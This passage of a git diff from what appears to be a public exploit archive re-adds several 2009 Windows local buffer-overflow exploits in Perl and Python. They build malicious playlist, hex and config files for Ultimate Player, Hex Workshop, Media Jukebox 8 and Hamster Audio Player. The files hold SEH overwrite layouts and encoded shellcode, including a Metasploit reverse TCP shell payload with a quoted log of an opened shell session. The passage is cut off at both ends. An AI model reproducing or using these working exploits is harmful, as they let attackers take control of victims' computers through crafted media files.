-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.m3u');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-31]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH
+####################################################################
+my $bof="\x41" x 4108;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.m3u');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-31]
diff --git a/platforms/windows/local/9550.txt b/platforms/windows/local/9550.txt
index a6cb88503..71c97aac6 100755
--- a/platforms/windows/local/9550.txt
+++ b/platforms/windows/local/9550.txt
@@ -1,119 +1,119 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH)
-# Found By: DATA_SNIPER
-# http://www.bpsoft.com/downloads/
-######################################################################################
-##info:: i write 3 exploits for the 3 v
-######################################################################################
-# USE>>file>>import>>hack4love.hex>> boom calc
-######################################################################################
-#
-#Hex Workshop v 3.11
-#
-######################################################################################
-my $hed1=":0000FC...";
-my $hed2="\n:";
-my $bof="41" x 172;
-my $nsh="EB069090";
-my $seh="62380012";
-my $nop="90" x 20;
-my $sec=
-"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
-
-print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-#######################################################################################
-open(myfile,'>> HACK4LOVE.hex');
-print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-######################################################################################
-######################################################################################
-######################################################################################
-######################################################################################
-#
-#Hex Workshop V 4.00 // v 4.20
-#
-######################################################################################
-my $hed1=":0000FC...";
-my $hed2="\n:";
-my $bof="41" x 172;
-my $nsh="EB069090";
-my $seh="62380012";
-my $nop="90" x 20;
-my $sec=
-"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
-
-print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-
-######################################################################################
-open(myfile,'>> HACK4LOVE.hex');
-print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-######################################################################################
-######################################################################################
-######################################################################################
-#
-#Hex Workshop V 4.21 // 4.22 // 4.23
-#
-######################################################################################
-my $hed1=":0000FC...";
-my $hed2="\n:";
-my $bof="41" x 176;
-my $nsh="EB069090";
-my $seh="8c29d374";
-my $nop="90" x 20;
-my $sec=
-"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
-
-print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-
-######################################################################################
-open(myfile,'>> HACK4LOVwwE.hex');
-print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-######################################################################################
-######################################################################################
-######################################################################################
-######################################################################################
-#
-#Hex Workshop v 5
-#v5.0 beta 1//v5.0.0.2511//v5.0.1.272//v5.0.2.2769//v5.1.1.3963/v5.1.3.4159/v5.1.4.4188
-#
-######################################################################################
-my $hed1=":0000FC...";
-my $hed2="\n:";
-my $bof="41" x 172;
-my $nsh="EB069090";
-my $seh="38f8d374";
-my $nop="90" x 20;
-my $sec=
-"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
-
-print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-#######################################################################################
-open(myfile,'>> HACK4LOsssVE.hex');
-print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-#######################################################################################
-#######################################################################################
-#######################################################################################
-#######################################################################################
-#
-#Hex Workshop v6.0.0.4582 //v6.0.1.4603
-#
-#######################################################################################
-#######################################################################################
-my $hed1=":0000FC...";
-my $hed2="\n:";
-my $bof="41" x 2228;
-my $nsh="EB069090";
-my $seh="38f8d374";
-my $nop="90" x 20;
-my $sec=
-"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
-
-print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-
-#########################################################################################
-open(myfile,'>> HACK4LOVE.hex');
-print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
-#######################################################################################
-
-# milw0rm.com [2009-08-31]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH)
+# Found By: DATA_SNIPER
+# http://www.bpsoft.com/downloads/
+######################################################################################
+##info:: i write 3 exploits for the 3 v
+######################################################################################
+# USE>>file>>import>>hack4love.hex>> boom calc
+######################################################################################
+#
+#Hex Workshop v 3.11
+#
+######################################################################################
+my $hed1=":0000FC...";
+my $hed2="\n:";
+my $bof="41" x 172;
+my $nsh="EB069090";
+my $seh="62380012";
+my $nop="90" x 20;
+my $sec=
+"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
+
+print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+#######################################################################################
+open(myfile,'>> HACK4LOVE.hex');
+print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+######################################################################################
+######################################################################################
+######################################################################################
+######################################################################################
+#
+#Hex Workshop V 4.00 // v 4.20
+#
+######################################################################################
+my $hed1=":0000FC...";
+my $hed2="\n:";
+my $bof="41" x 172;
+my $nsh="EB069090";
+my $seh="62380012";
+my $nop="90" x 20;
+my $sec=
+"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
+
+print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+
+######################################################################################
+open(myfile,'>> HACK4LOVE.hex');
+print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+######################################################################################
+######################################################################################
+######################################################################################
+#
+#Hex Workshop V 4.21 // 4.22 // 4.23
+#
+######################################################################################
+my $hed1=":0000FC...";
+my $hed2="\n:";
+my $bof="41" x 176;
+my $nsh="EB069090";
+my $seh="8c29d374";
+my $nop="90" x 20;
+my $sec=
+"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
+
+print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+
+######################################################################################
+open(myfile,'>> HACK4LOVwwE.hex');
+print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+######################################################################################
+######################################################################################
+######################################################################################
+######################################################################################
+#
+#Hex Workshop v 5
+#v5.0 beta 1//v5.0.0.2511//v5.0.1.272//v5.0.2.2769//v5.1.1.3963/v5.1.3.4159/v5.1.4.4188
+#
+######################################################################################
+my $hed1=":0000FC...";
+my $hed2="\n:";
+my $bof="41" x 172;
+my $nsh="EB069090";
+my $seh="38f8d374";
+my $nop="90" x 20;
+my $sec=
+"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
+
+print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+#######################################################################################
+open(myfile,'>> HACK4LOsssVE.hex');
+print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+#######################################################################################
+#######################################################################################
+#######################################################################################
+#######################################################################################
+#
+#Hex Workshop v6.0.0.4582 //v6.0.1.4603
+#
+#######################################################################################
+#######################################################################################
+my $hed1=":0000FC...";
+my $hed2="\n:";
+my $bof="41" x 2228;
+my $nsh="EB069090";
+my $seh="38f8d374";
+my $nop="90" x 20;
+my $sec=
+"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";
+
+print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+
+#########################################################################################
+open(myfile,'>> HACK4LOVE.hex');
+print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
+#######################################################################################
+
+# milw0rm.com [2009-08-31]
diff --git a/platforms/windows/local/9551.py b/platforms/windows/local/9551.py
index 7156dc6c2..19d560b94 100755
--- a/platforms/windows/local/9551.py
+++ b/platforms/windows/local/9551.py
@@ -1,102 +1,102 @@
-#!/usr/bin/python
-#
-# ######################################################################
-#
-# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)
-# Author: mr_me
-# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html
-# Note: we needed a header to trigger this one  ;) 
-# Tested on: Wind0ws XP and Vist@
-# Greetz: offensive-security, I tried harder  :) 
-# 
-# ######################################################################
-#
-# msf exploit(handler) > exploit
-#
-# [*] Handler binding to LHOST 0.0.0.0
-# [*] Started reverse handler
-# [*] Starting the payload handler...
-# [*] Sending stage (474 bytes)
-# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246)
-#
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Program Files> 
-#
-
-def banner():
-	print "\n|-------------------------------------------------------------|" 
-	print "| Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) |" 
-	print "|                       by MrMe 09/09                         |"
-	print "|-------------------------------------------------------------|\n"
-
-# windows/shell/reverse_tcp - 617 bytes (stage 1)
-# http://www.metasploit.com
-# Encoder: x86/alpha_mixed
-# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444
-
-sc = ("\xda\xc8\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
-"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
-"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
-"\x4c\x4d\x38\x50\x56\x45\x50\x45\x50\x43\x30\x51\x43\x50\x55"
-"\x46\x36\x50\x57\x4c\x4b\x42\x4c\x46\x44\x45\x48\x4c\x4b\x47"
-"\x35\x47\x4c\x4c\x4b\x50\x54\x44\x45\x42\x58\x45\x51\x4b\x5a"
-"\x4c\x4b\x51\x5a\x44\x58\x4c\x4b\x50\x5a\x47\x50\x43\x31\x4a"
-"\x4b\x4b\x53\x46\x52\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31"
-"\x4a\x4e\x46\x51\x4b\x4f\x4b\x4c\x50\x31\x49\x50\x4e\x4c\x46"
-"\x58\x4d\x30\x42\x54\x44\x47\x49\x51\x48\x4f\x44\x4d\x43\x31"
-"\x49\x57\x4a\x4b\x4c\x32\x47\x4b\x43\x4c\x46\x44\x45\x44\x42"
-"\x55\x4b\x51\x4c\x4b\x51\x4a\x47\x54\x45\x51\x4a\x4b\x45\x36"
-"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x5a\x45\x4c\x45\x51\x4a"
-"\x4b\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4b\x58\x4a\x4b\x45\x52"
-"\x50\x31\x49\x50\x51\x4f\x51\x4e\x51\x4d\x51\x4b\x49\x52\x44"
-"\x48\x45\x50\x51\x4e\x43\x5a\x46\x50\x50\x59\x45\x34\x4c\x4b"
-"\x45\x49\x4c\x4b\x51\x4b\x44\x4c\x4c\x4b\x51\x4b\x45\x4c\x4c"
-"\x4b\x45\x4b\x4c\x4b\x51\x4b\x45\x58\x51\x43\x43\x58\x4c\x4e"
-"\x50\x4e\x44\x4e\x4a\x4c\x4b\x4f\x48\x56\x4c\x49\x48\x47\x51"
-"\x43\x45\x38\x51\x44\x49\x5a\x4e\x4f\x4c\x51\x4b\x4f\x49\x46"
-"\x4b\x31\x4a\x4c\x43\x30\x45\x51\x45\x50\x43\x30\x50\x50\x51"
-"\x47\x51\x46\x51\x43\x4b\x39\x4b\x55\x4a\x48\x45\x4f\x43\x30"
-"\x45\x50\x43\x30\x4a\x30\x43\x31\x43\x30\x43\x30\x4e\x56\x42"
-"\x39\x44\x58\x4b\x57\x4e\x44\x44\x59\x42\x50\x4b\x59\x4a\x4c"
-"\x4c\x39\x4e\x4a\x45\x30\x4e\x39\x45\x59\x4b\x45\x4e\x4d\x48"
-"\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x37\x50\x53\x50\x32\x51\x4f"
-"\x46\x53\x46\x52\x43\x30\x51\x4b\x4c\x4d\x50\x4b\x42\x38\x46"
-"\x31\x4b\x4f\x49\x47\x4c\x49\x49\x4f\x4c\x49\x49\x53\x4c\x4d"
-"\x43\x45\x42\x34\x42\x4a\x45\x55\x50\x59\x50\x51\x46\x33\x4b"
-"\x4f\x50\x34\x4c\x4f\x4b\x4f\x51\x45\x43\x34\x51\x49\x4d\x59"
-"\x44\x44\x4c\x4e\x4b\x52\x4c\x32\x46\x4b\x51\x37\x46\x34\x4b"
-"\x4f\x47\x47\x4b\x4f\x51\x45\x51\x38\x50\x31\x49\x50\x46\x30"
-"\x46\x30\x46\x30\x50\x50\x51\x50\x46\x30\x47\x30\x50\x50\x4b"
-"\x4f\x51\x45\x47\x54\x4d\x59\x48\x47\x43\x58\x49\x50\x49\x38"
-"\x45\x50\x43\x32\x42\x48\x43\x32\x43\x30\x42\x31\x51\x4c\x4d"
-"\x59\x4b\x51\x43\x5a\x44\x50\x46\x31\x51\x47\x4b\x4f\x51\x45"
-"\x51\x30\x42\x4a\x51\x50\x51\x4e\x46\x36\x49\x51\x4a\x46\x44"
-"\x46\x46\x36\x49\x51\x4d\x36\x45\x58\x50\x56\x43\x5a\x43\x30"
-"\x4b\x4f\x46\x35\x44\x4c\x4b\x39\x48\x43\x43\x5a\x43\x30\x50"
-"\x56\x46\x33\x51\x47\x4b\x4f\x51\x45\x42\x38\x4b\x4f\x4e\x33"
-"\x41\x41")
-
-header = ("[playlist]\n");
-header += ("NumberOfEntries=3\n\n");
-header += ("File1=http://");	# give a dummy header to trick the app
-crash = ("\x41" * 262);		# overwrite the buffer at 262 bytes
-jmp = ("\xeb\x06\x90\x90"); 	# short jump over SEH handler
-seh = ("\x6f\x29\x01\x10"); 	# universal p/p/r from wnaspi32.dll
-nops = ("\x90" * 5);		# nop sled for easy landing
-junk = ("\xCC" * 500);		# gotta make the size seem real  ;) 
-
-buff = header + crash + jmp + seh + nops + sc + junk
-banner()
-
-try:
-	file = open('mr_mes-wicked_miX.pl','w');
-	file.write(buff);
-	file.close();
-	print "[+] File created successfully: mr_mes-wicked_miX.pls\n";
-except:
-	print "[-] Error cant write file to system\n";
-
-# milw0rm.com [2009-08-31]
+#!/usr/bin/python
+#
+# ######################################################################
+#
+# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)
+# Author: mr_me
+# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html
+# Note: we needed a header to trigger this one  ;) 
+# Tested on: Wind0ws XP and Vist@
+# Greetz: offensive-security, I tried harder  :) 
+# 
+# ######################################################################
+#
+# msf exploit(handler) > exploit
+#
+# [*] Handler binding to LHOST 0.0.0.0
+# [*] Started reverse handler
+# [*] Starting the payload handler...
+# [*] Sending stage (474 bytes)
+# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246)
+#
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Program Files> 
+#
+
+def banner():
+	print "\n|-------------------------------------------------------------|" 
+	print "| Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) |" 
+	print "|                       by MrMe 09/09                         |"
+	print "|-------------------------------------------------------------|\n"
+
+# windows/shell/reverse_tcp - 617 bytes (stage 1)
+# http://www.metasploit.com
+# Encoder: x86/alpha_mixed
+# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444
+
+sc = ("\xda\xc8\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
+"\x4c\x4d\x38\x50\x56\x45\x50\x45\x50\x43\x30\x51\x43\x50\x55"
+"\x46\x36\x50\x57\x4c\x4b\x42\x4c\x46\x44\x45\x48\x4c\x4b\x47"
+"\x35\x47\x4c\x4c\x4b\x50\x54\x44\x45\x42\x58\x45\x51\x4b\x5a"
+"\x4c\x4b\x51\x5a\x44\x58\x4c\x4b\x50\x5a\x47\x50\x43\x31\x4a"
+"\x4b\x4b\x53\x46\x52\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31"
+"\x4a\x4e\x46\x51\x4b\x4f\x4b\x4c\x50\x31\x49\x50\x4e\x4c\x46"
+"\x58\x4d\x30\x42\x54\x44\x47\x49\x51\x48\x4f\x44\x4d\x43\x31"
+"\x49\x57\x4a\x4b\x4c\x32\x47\x4b\x43\x4c\x46\x44\x45\x44\x42"
+"\x55\x4b\x51\x4c\x4b\x51\x4a\x47\x54\x45\x51\x4a\x4b\x45\x36"
+"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x5a\x45\x4c\x45\x51\x4a"
+"\x4b\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4b\x58\x4a\x4b\x45\x52"
+"\x50\x31\x49\x50\x51\x4f\x51\x4e\x51\x4d\x51\x4b\x49\x52\x44"
+"\x48\x45\x50\x51\x4e\x43\x5a\x46\x50\x50\x59\x45\x34\x4c\x4b"
+"\x45\x49\x4c\x4b\x51\x4b\x44\x4c\x4c\x4b\x51\x4b\x45\x4c\x4c"
+"\x4b\x45\x4b\x4c\x4b\x51\x4b\x45\x58\x51\x43\x43\x58\x4c\x4e"
+"\x50\x4e\x44\x4e\x4a\x4c\x4b\x4f\x48\x56\x4c\x49\x48\x47\x51"
+"\x43\x45\x38\x51\x44\x49\x5a\x4e\x4f\x4c\x51\x4b\x4f\x49\x46"
+"\x4b\x31\x4a\x4c\x43\x30\x45\x51\x45\x50\x43\x30\x50\x50\x51"
+"\x47\x51\x46\x51\x43\x4b\x39\x4b\x55\x4a\x48\x45\x4f\x43\x30"
+"\x45\x50\x43\x30\x4a\x30\x43\x31\x43\x30\x43\x30\x4e\x56\x42"
+"\x39\x44\x58\x4b\x57\x4e\x44\x44\x59\x42\x50\x4b\x59\x4a\x4c"
+"\x4c\x39\x4e\x4a\x45\x30\x4e\x39\x45\x59\x4b\x45\x4e\x4d\x48"
+"\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x37\x50\x53\x50\x32\x51\x4f"
+"\x46\x53\x46\x52\x43\x30\x51\x4b\x4c\x4d\x50\x4b\x42\x38\x46"
+"\x31\x4b\x4f\x49\x47\x4c\x49\x49\x4f\x4c\x49\x49\x53\x4c\x4d"
+"\x43\x45\x42\x34\x42\x4a\x45\x55\x50\x59\x50\x51\x46\x33\x4b"
+"\x4f\x50\x34\x4c\x4f\x4b\x4f\x51\x45\x43\x34\x51\x49\x4d\x59"
+"\x44\x44\x4c\x4e\x4b\x52\x4c\x32\x46\x4b\x51\x37\x46\x34\x4b"
+"\x4f\x47\x47\x4b\x4f\x51\x45\x51\x38\x50\x31\x49\x50\x46\x30"
+"\x46\x30\x46\x30\x50\x50\x51\x50\x46\x30\x47\x30\x50\x50\x4b"
+"\x4f\x51\x45\x47\x54\x4d\x59\x48\x47\x43\x58\x49\x50\x49\x38"
+"\x45\x50\x43\x32\x42\x48\x43\x32\x43\x30\x42\x31\x51\x4c\x4d"
+"\x59\x4b\x51\x43\x5a\x44\x50\x46\x31\x51\x47\x4b\x4f\x51\x45"
+"\x51\x30\x42\x4a\x51\x50\x51\x4e\x46\x36\x49\x51\x4a\x46\x44"
+"\x46\x46\x36\x49\x51\x4d\x36\x45\x58\x50\x56\x43\x5a\x43\x30"
+"\x4b\x4f\x46\x35\x44\x4c\x4b\x39\x48\x43\x43\x5a\x43\x30\x50"
+"\x56\x46\x33\x51\x47\x4b\x4f\x51\x45\x42\x38\x4b\x4f\x4e\x33"
+"\x41\x41")
+
+header = ("[playlist]\n");
+header += ("NumberOfEntries=3\n\n");
+header += ("File1=http://");	# give a dummy header to trick the app
+crash = ("\x41" * 262);		# overwrite the buffer at 262 bytes
+jmp = ("\xeb\x06\x90\x90"); 	# short jump over SEH handler
+seh = ("\x6f\x29\x01\x10"); 	# universal p/p/r from wnaspi32.dll
+nops = ("\x90" * 5);		# nop sled for easy landing
+junk = ("\xCC" * 500);		# gotta make the size seem real  ;) 
+
+buff = header + crash + jmp + seh + nops + sc + junk
+banner()
+
+try:
+	file = open('mr_mes-wicked_miX.pl','w');
+	file.write(buff);
+	file.close();
+	print "[+] File created successfully: mr_mes-wicked_miX.pls\n";
+except:
+	print "[-] Error cant write file to system\n";
+
+# milw0rm.com [2009-08-31]
diff --git a/platforms/windows/local/9567.pl b/platforms/windows/local/9567.pl
index 5d130ba91..9fb5250cd 100755
--- a/platforms/windows/local/9567.pl
+++ b/platforms/windows/local/9567.pl
@@ -1,38 +1,38 @@
-#!/usr/bin/perl
-# by ThE g0bL!N
-# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit (SEH)
-#usage: after clicking on perl file put the cfg file on folder of hamster then open the program after that select option menu and boom Calc !!!
-############################################################################
-my $bof="\x41" x 4108;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xB8\x15\xC6\x72";
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
